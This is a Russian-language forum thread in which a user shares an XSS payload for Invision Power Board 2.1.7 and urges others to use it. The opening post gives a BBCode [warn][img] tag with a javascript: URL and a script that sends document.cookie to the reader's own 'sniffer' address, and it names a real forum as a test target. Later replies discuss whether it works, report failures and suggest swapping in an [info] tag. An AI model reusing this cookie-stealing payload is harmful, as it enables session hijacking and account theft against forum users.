Форумы Ура! Я вродь нашёл баг в Ipb 2.1.7

Короче роюсь я роюсь в своём форуме и нашёл баг-

Code:

[warn][img]j a v a s c r i p t:alert(/<script>img = new Image(); img.src = "адресс твоего сниффера?"+document.cookie;</script>/).jpg[/img][/warn]

Если у кого он сработает и если я кому помог тогда жду +++ ! =)

И кстати писать это надо прямиком в сообщение... Это пассивная Xss бага! Юзаем парни.... удачи!

==================

==================

 

"Динамические страницы в тэгах запрещены"

Боюсь такой же ответ ждет на большинстве форумов.

 

угу

 

Неа, не катит... А жаль.. =(

 

покажи конкретный 2.1.7 где ты это нашел. т.к. это бред..

 

blackybr forum.angelz.ru ток чур неломать а то мне капут!

 

Эта бага зависит от настроек форума, я так думаю. И очень мало форумов удасться сломать

 

У меня не сработала...(

 

Наврядли у кого будет это работать. Почти ва всех форумах запрещены. Я например попробывал на 5 форумах и ничего. А так поиск уязвимостей это благое дело!
За старание можно поставить +)

 

Всё просто, но не везде идёт. я этим давно пользовался.

 

Ребят я ж попросил что на forum.angelz.ru ненадо нечего делать! Блин ну даш для примера один форум потом расхлёбывай! (=

 

Ты же там админ - заткни багу и все... ЗЫ: я не ломал..
Лови + за старания и смелость..

 

Twiddle я там неадмин, я там супермодер, т.к. имею доступ к админке, ща попробую!

 

Есть еще Xss тока это надо иметь как минимум Модера.

 

_-[A.M.D]HiM@S-_
А поконкретней? Не слыхал ни разу.

 

а на чо теги [warn] заменить?

 

Не на что их не менять. Там просто тэг

 

У меня не работает, вставляю блок с кодом, в посте появляется надпись:
[warn][/warn]
И это обычным текстом, не ссылкой.

 

Блин что за вопросы... ща объясню-
[warn][/warn]- тег предупреждения
- тег картинки
Вся проблема в том что по стандарту в динамических страницах тег запрещены, вот поэтому работает ненавсех форумах. И ещё к примеру место тега [warn][/warn] мона подставить тег [info][/info]

 

Помойму это активная XSS... =/